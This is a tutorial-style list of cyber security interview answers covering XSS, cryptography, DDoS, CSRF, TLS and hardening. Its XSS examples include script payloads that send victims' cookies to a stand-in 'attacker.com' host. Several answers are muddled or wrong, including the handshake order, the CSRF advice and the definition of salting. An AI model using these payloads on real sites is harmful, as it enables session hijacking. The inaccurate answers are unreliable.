Cyber Security Interview Questions and Answers

Cyber security or information security is a particular task of protecting computers or systems, networks, programs and data controls from cyber-attacks. These attacks are usually aimed at accessing, changing, or destroying sensitive information, personal information stolen and extorting money from users or interrupting normal business processes.

When InfoSec experts are developing policies and procedures for an effective information security program, they use the CIA (confidentiality, integrity and availability) triad as a guide.The main goals of information security are Confidentiality, Integrity and Availability (CIA).

Confidentiality: Confidentiality is about controlling access to files either in storage or in transit. It means the information available on a system should be safe from unauthorized people.

Integrity: It means the information available in an organization should be complete and whole. It shouldn’t be altered by any unauthorized person. Intentional or unintentional attacks on the information will cause severe damage and finally the information becomes unreliable.

Availability: Availability is the Cinderella of information security as it is rarely discussed. Availability is as important as Confidentiality and Integrity. It means the information requested or required by the authorized users should always be available.

Cyber-attacks can disrupt and cause considerable financial and reputational damage to even the most resilient organization. If you suffer a cyber-attack, you stand to lose assets, reputation and business, and potentially face regulatory fines and litigation – as well as the costs of remediation

Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk.

Cross site scripting attacks in two types: stored XSS and reflected XSS.

Stored XSS:

Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Stored Cross-site scripting vulnerabilities happens when the payload is saved, for example in a database and then is executed when a user opens the page. Stored cross-site scripting is very dangerous for a number of reasons:

Example of a Stored XSS:

A stored XSS vulnerability can happen if the username of an online forum member is not properly sanitized when it is printed on the page. In such case an attacker can insert malicious code when registering a new user on the form. When the username is reflected on the forum page, it will look like this:

Username: user123<script>document.location=’https://attacker.com/?cookie=’+encodeURIComponent(document.cookie)</script>

Registered since: 2018

The above code is triggered every time a user visits this forum section, and it sends the users’ cookies of the forum to the attacker, who is then able to use them to hijack their sessions. Stored XSS can be a very dangerous vulnerability since it can have the effect of a worm, especially when exploited on popular pages.

For example, imagine a forum or social media website that has a public facing page that is vulnerable to a stored XSS vulnerability, such as the profile page of the user. If the attacker is able to place a malicious payload that adds itself to the profile page, each time someone opens it the payload will spread itself with an exponential growth.

Reflected XSS:

Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user’s browser. The script is embedded into a link, and is only activated once that link is clicked on. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored.

This means that an attacker has to send a crafted link or post form to the victim to insert the payload, and the victim should click the link. This kind of payload is also generally being caught by built in browser XSS filters, like in Chrome, Internet Explorer or Edge.

Example of a Reflected XSS:

As an example, we will use a search functionality on a news website, which works by appending the user’s input, which is taken from the GET request, to the q parameter, as per the example below:

https://examplexx.com/news?q=data+breach

In the search results the website reflects the content of the query that the user searched for, such as:

You searched for “data breach”:

If the Search functionality is vulnerable to a reflected cross-site scripting vulnerability, the attacker can send the victim a link such as the below:

https://examplexx.com/news?q=<script>document. location=’https://attacker.com/log.php?c=’ + encodeURIComponent(document.cookie)</script>

Once the victim clicks on the link, the website will display the following:

You searched for “<script>document. Location=’https://attacker.com/log.php?c=’ + document.cookie</script>”:

The HTML source code, which is reflecting the attacker’s malicious code redirects the victim to a website that is controlled by the attacker, which can then record the user’s current cookie for

examplexx.com as GET parameter. (More about this see netsparker)

It is  a another type of XSS .DOM-based XSS is an advanced type of XSS attack which is made possible when the web application’s client side scripts write user provided data to the Document Object Model (DOM). The data is subsequently read from the DOM by the web application and outputted to the browser. If the data is incorrectly handled, an attacker can inject a payload, which will be stored as part of the DOM and executed when the data is read back from the DOM.

Like any other injection attack, Cross Site Scripting attack can also be prevented by the use of the proper available sanitizers. Web developers have to have an eye on the gateways through which they receive information and these are the gateways which must be made as a barrier for malicious files. There are software or applications available for doing this, like the XSS Me for Firefox and dom snitch for Google Chrome. Also, the default web application firewall formula, popularly known as Mod Security Plus will also do the job quite satisfactorily.

Vulnerability: A vulnerability is a weakness in a system or application that may be exploited to violate that specific system without any context to the impact involved. Vulnerability refers to the security flaws in or a computer or system that allow an attack to be successful. A successful compromise of a vulnerability may result in data manipulation, code execution, data loss etc.

Risk: Risk is the intersection of threats, assets, and vulnerabilities. The potential for loss, damage or destruction of an asset as a result of a threat exploiting a vulnerability. Risk is essentially the level of possibility that an action will lead to lead to a loss or to an undesired outcome. The risk may even pay off and not lead to a loss, it may lead to a gain. A risk assessment is performed to determine the most important potential security breaches to address now, rather than later.

Threat: A threat is what we’re trying to protect against. A potential danger to the machine system. It describes something that a company doesn’t want to happen. The successful exploitation of the vulnerability is a threat. A threat may be a malicious attacker who is attempting to obtain unauthorized access to an asset. Natural or man-made occurrence, individual, entity, or action that has or indicates the potential to harm life, information, operations, the environment and/or property.

Exploit: The exploit is something that takes advantage of vulnerability in an asset to generate unintended or unexpected behavior in the target system, which would enable an attacker to get access to data or information.

Budget, lack of buy-in, communication breakdowns between development, Information Technology security operations, and management come to mind.

Black Box Testing: Black box testing also known as functional testing treats software under test as a black-box without knowing the internal structure of code or program. Black box testing user validate the functionalities against the requirements.it is applicable to the higher level of testing

White Box Testing: White box testing also known as glass box testing, clear box testing, transparent box testing, and structural testing. It looks inside the software that is being tested and uses that knowledge as part of the testing process. White box testing user check the internal structural coding or program part of the application. It is applicable to the lower level testing.

Encoding: Encoding is a process of transforming the format of the data into another format so that it easily transferable over a network .Encoding transforms data into other formatting using a scheme that is publicly available so that it can easily be reversed. The main purpose of Encoding is protection of integrity of data.

Hashing: Hashing is meant to protect or keep data such as strings (passwords usually) or file secure. The data is converted to a message digest or hash, which is a number generated from a string of text. These digests are important as one can easily match the hash of sent and received messages to ensure that both are the same and no tempering is done with the data. The main purpose of Hashing is verification of data.

Encryption: Encryption is the process of transforming information using an algorithm. Encryption deals with keys which are used to encrypt and decrypt the data. These keys are used to transform a simple text into a cypher text and the vice versa. Encryption is used for maintaining the confidentiality of sensitive data. Encryption transforms the form of data in order to keep it safe and secured from. The main purpose of Encryption is protection of Security of data.

A botnet is a network of computers infected by malware that are under the control of a single attacking party, known as the “bot-herder.” In this individual attackers, cyber-criminal groups, and nation-states looking to disrupt or break into their targets’ systems. Botnets have become one of the biggest threats to security systems today. Their growing popularity among cybercriminals comes from their ability to infiltrate almost any internet-connected device, from DVR players to corporate mainframes. The use of botnets to mine cryptocurrencies like Bitcoin is a growing business for cyber criminals. It’s predicted the trend will continue, resulting in more computers infected with mining software and more digital wallets stolen.

 A DDoS (Distributed Denial of Service) attack is a malicious attempt to make a server or a network resource unavailable to users. It is achieved by saturating a service, which results in its temporary suspension or interruption. A Denial of Service (DoS) attack involves a single machine used to either target a software vulnerability or flood a targeted resource with packets, requests or queries.

A DDoS attack, however, uses multiple connected devices—often executed by botnets or, on occasion, by individuals who have coordinated their activity.

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

Open source software is software with source code that anyone can inspect, modify, and enhance. Source code is the part of software that most computer users don’t ever see; it’s the code computer programmers can manipulate to change how a piece of software a “program” or “application works. Programmers who have access to a computer program’s source code can improve that program by adding features to it or fixing parts that don’t always work correctly.

The securities of these projects depend mainly on the size of the project, the total number of the developers who are working under this project and the one factor, which is most essential as well as important, is the control of the quality. Just the type of project won’t determine its quality, the inside matter of the corresponding projects will matter.

Cryptography is the practice and study of manipulating data so that it can be stored and transmitted without being read by anyone not meant to see the data, even if they obtain or intercept it. Cryptography not only protects data from theft or alteration, but can also be used for user authentication. Cryptography is a method of using advanced mathematical principles in storing and transmitting data in a particular form so that only those whom it is intended can read and process it.

Symmetric Key Cryptography: Symmetric encryption uses a single key for both encryption and Decryption. Both user should agree or exchange the same key. Or Symmetric key cryptography is useful if you want to encrypt files on your computer, and you intend to decrypt them yourself.

It is less useful if you intend to send them to someone else to be decrypted, because in that case you have a “key distribution problem”: securely communicating the encryption key to your correspondent may not be much easier than securely communicating the original text.  It is used for bulk data transmission.  It is safe and fast. The commonly used symmetric encryption algorithms are DES, 3 DES, AES, RC4.

Public Key Cryptography: Public key cryptography is also known as asymmetric encryption symmetric encryption uses a different key for encryption and decryption. In this Two different keys required: – public key and private key. Everyone can see the public key and only the one who has private key can decode the message.  It is used for securely exchanging secret keys. The most common asymmetric encryption algorithm are Diffie-Hellman and RSA algorithm.

In cryptography, a salt is random data that is used as an additional input to a one-way function that “hashes” data, a password or passphrase. Salts are closely related to the concept of nonce. The primary function of salts is to defend against dictionary attacks or against its hashed equivalent, a pre-computed rainbow table attack.

The use of salting is to make your passwords stronger and not easy to be cracked if you are someone who is prone to use of simple or ordinary words as passwords (Wiki says)

It is a form of password encryption that involves appending a password to a given username and then hashing the new string of characters. This is usually done via an MD5 hashing algorithm.

Password-salting is most commonly found within Linux operating systems, and it is generally considered a more secure password encryption model than any of the models used within the various Microsoft distributions.

Traceroute is a utility that traces a packet from your computer to an Internet host, showing how many hops the packet requires to reach the host and how long each hop takes. If you’re visiting a Web site and pages are appearing slowly, you can use traceroute to figure out where the longest delays are occurring.

Vulnerability Assessment is an approach used to find flaws in an application/network whereas Penetration testing is the practice of finding exploitable vulnerabilities like a real attacker will do. VA is like travelling on the surface whereas PT is digging it for gold.

In computer terminology, a honeypot is a decoy computer system for trapping hackers or tracking unconventional or new hacking methods. Honeypots are designed to purposely engage and deceive hackers and identify malicious activities performed over the Internet.

Residual risk is defined as the threat that remains after every effort has been made to identify and eliminate risks in a given situation. In other words, it is the degree of exposure to a potential hazard even after that hazard has been identified and the agreed upon mitigation has been implemented.

Residual risk is the modified risk after internal controls have been implemented and monitored and the effect of their findings considered.

Passwords: Passwords is something that the user should know from when they started their activity.

Token: Tokens is something they are provided with and should have it.

Biometrics: Biometric is an internal property of that person registered for verification.

OTP: A one-time pin or password is sent to the user through which they verify the identity.

To avoid brute force login attacks, you generally have three kinds of techniques to go about. The first technique is to implement a policy for account lockout. In this method, an account will be locked out unless and until the administrator himself opens it. The second being progressive delays. In this method, after a few attempts of login, your account will stay locked for the next few number of days. Lastly, use a challenge-response test. This prevents any kind of automatic submissions on the login page.

Every system has its own security software’s so for securing your Linux, the first three steps are:

Auditing: A system scan is performed using a tool called Lynis for auditing. Every category is scanned separately and the hardening index is provided to the auditor for further steps.

Hardening: After the audit is complete, the system is hardened depending on the level of security it further needs. It is an important process based on the decision of auditor.

Compliance: The system needs to be checked almost every day for better results and also lesser threats from security point of view.

The Domain Name System (DNS) allots your website under a certain domain that is easily recognizable and also keeps the information about other domain names. It works like a directory for everything on the internet. Thus, DNS monitoring is very important since you can easily visit a website without actually having to memorize their IP address.

The three-way handshake is a cornerstone of the TCP suite: SYN, SYN/ACK, ACK. SYN is the outgoing connection request from client to server. ACK is the acknowledgement of the server back to the client, saying that yes I hear you, let’s open a connection. SYN/ACK is the final connection and allows the two to speak. The problem is that this can be used as a very basic type of Denial of Service Attack.

The client opens up the SYN connection, the server responds with the SYN/ACK, but then the client sends another SYN. The server treats this as a new connection request and keeps the previous connection open. As this is repeated over and over many times very quickly, the server quickly becomes saturated with a huge number of connection requests, eventually overloading its ability to connect to legitimate users.

When the device generated an alert for an intrusion which has actually not happened: this is false positive and if the device has not generated any alert and the intrusion has actually happened, this is the case of a false negative.

‘Chain of custody’ refers to the protocol for handling physical proof that will be introduced in a courtroom, ensuring evidence complies with the rules of criminal procedure. When keeping track of data or equipment for use in legal proceedings, it needs to remain in a pristine state. Therefore, documenting exactly who has had access to what for how long is vital when dealing with this situation. Any compromise in the data can lead to legal issues for the parties involved and can lead to a mistrial or contempt depending on the scenario.

Black hat hacker: A black hat hacker may exploit security vulnerabilities for monetary gain; to steal or destroy private data; or to alter, disrupt or shut down websites and networks. The black hat hacker may also sell these exploits to other criminal organizations.

White-hat hacker: White-hat hackers are the opposite of the black-hat hackers. They’re the Ethical hackers, experts in compromising computer security systems who use their abilities for good, ethical, and legal purposes rather than bad, unethical, and criminal purposes.

Gray-hat hacker: A gray-hat hacker falls somewhere between a black hat and a white hat. A gray hat doesn’t work for their own personal gain or to cause carnage, but they may technically commit crimes and do arguably unethical things. While they do not hack into systems with the malicious goal of stealing data, they may be willing to use illegal methods to find flaws, expose vulnerabilities to the public or sell zero-day exploits to government and intelligence agencies.

Infiltration is the method by which you enter or smuggle elements into a location. Exfiltration is just the opposite: getting sensitive information or objects out of a location without being discovered. In an environment with high security, this can be extremely difficult but not impossible. Again we turn to our friends in the fake delivery uniforms wandering around the building, and see that yes there are ways to get in and out without a lot of issues.

Data exfiltration or Data extrusion is the unauthorized transfer of data from a computer. The transfer of data can be manual by someone with physical access to the computer or automated, carried out through malware over a network. Because data routinely moves in and out of networked enterprises, data exfiltration can closely resemble normal network traffic, making detection of exfiltration attempts challenging for IT security groups.

Cross site request forgery (CSRF), also known as XSRF, Sea Surf or Session Riding, is an attack vector that tricks a web browser into executing an unwanted action in an application to which a user is logged in. the attack itself is quite simple. A CSRF vulnerability allows an attacker to force a logged-in user to perform an important action without their consent or knowledge. It is the digital equivalent of an attacker forging the signature of a victim on an important document. Furthermore, the attack leaves no evidence behind, since a forged request contains all of the information and comes from the same IP address as a real request from a victim.

Security misconfiguration is simply that – incorrectly assembling the safeguards for a web application.  These misconfigurations typically occur when holes are left in the security framework of an application by systems administrators, DBAs or developers. 

When CSRF attacks, you can opt for two available methods. Firstly, with every request try to include a random token. In this way a unique string of tokens will be generated which is a good safeguard. Secondly, for each field of form, try using different names. This will somewhat help you in becoming anonymous due to the entry of so many different names and thus will behave as a safeguard from CSRF attacks.

A home network is a group of devices like computers, game systems, printers, and mobile devices that connect to the Internet and each other. Home networks connect in two ways:

A wired network, which connects devices like printers and scanners with cables

A wireless network, which connects devices like tablets and e-readers without cables.

HTTPS (Hyper Text Transfer Protocol Secure) is a secure version of the HTTP web protocol that uses SSL or TLS and PKI to encrypt data in transit. The server responds with various SSL/TLS options. The client issues a response encrypted with the servers public key so that the server can decrypt with its private. The use of HTTPS protects against eavesdropping and man-in-the-middle attacks. HTTPS is used by Websites that collects sensitive customer data such as banking information, credit card information or purchasing information. So when you are making an online transaction, you must make sure that it is done over HTTPS so that your data is safe.

SSL and TLS are both cryptographic protocols that provide authentication and data encryption between servers, machines and applications operating over a network.

SSL: Secure Sockets Layer (SSL) is a standard security protocol for establishing encrypted links between a web server and a browser in an online communication. The usage of SSL technology ensures that all data transmitted between the web server and browser remains encrypted. SSL was deprecated for use on the internet by the Internet Engineering Task Force (IETF) in 2015 and has been replaced by the Transport Layer Security (TLS) protocol. While TLS and SSL are not interoperable, TLS is backwards-compatible with SSL 3.0.

TLS: Transport Layer Security (TLS) is a protocol that provides privacy and data integrity between two communicating applications. It’s the most widely deployed security protocol used today, and is used for Web browsers and other applications that require data to be securely exchanged over a network, such as file transfers, VPN connections, instant messaging and voice over IP.

Some Common HTTP attacks are:

• SQL injection
• Input Validation
• URL interpretation
• Impersonation
• Buffer overflow
• Session Hijacking
• Cross-Site Scripting

Host Intrusion Detection System (HIDS) is one in which snapshot of the current system is taken and contrast to previous snapshots. It checks if critical files were modified or deleted then an alert is sent to the administrator.

Website architecture is the planning and design of the technical, functional and visual components of a website – before it is designed, developed and deployed. It is used by website designers and developers as a means to design and develop a website.

Data leakage typically occurs when a brand, agency or ad tech company collects data about a website’s audience and subsequently uses that data without the initial publisher’s permission. Data can get leaked through various ways – emails, prints, laptops getting lost, unauthorized upload of data to public portals, removable drives, photographs etc.

Most useful certification for security analyst are

Security Essentials (GSEC): It declares that candidate is expert in handling basic security issues- it is the basic certification in security

Certified Security Leadership (CSL): It declares the certification of management abilities and the skills that is required to lead the security team

Certified Forensic Analyst: It certifies the ability of an individual to conduct formal incident investigation and manage advanced incident handling scenarios including external and internal data breach intrusions

Certified Firewall Analyst (CFA): It declares that the individual has proficiency in skills and abilities to design, monitor and configure routers, firewalls and perimeter defense systems.

WEP cracking is the method of exploiting security vulnerabilities in wireless networks and gaining unauthorized access.

• Anti-virus and firewalls
• Safe installation and configuration of the web server software
• Patch Management
• Secure installation and configuration of the O.S
• Scanning system vulnerability
• Remote administration disabling
• Removing of unused and default account
• Changing of default ports and settings to customs port and settings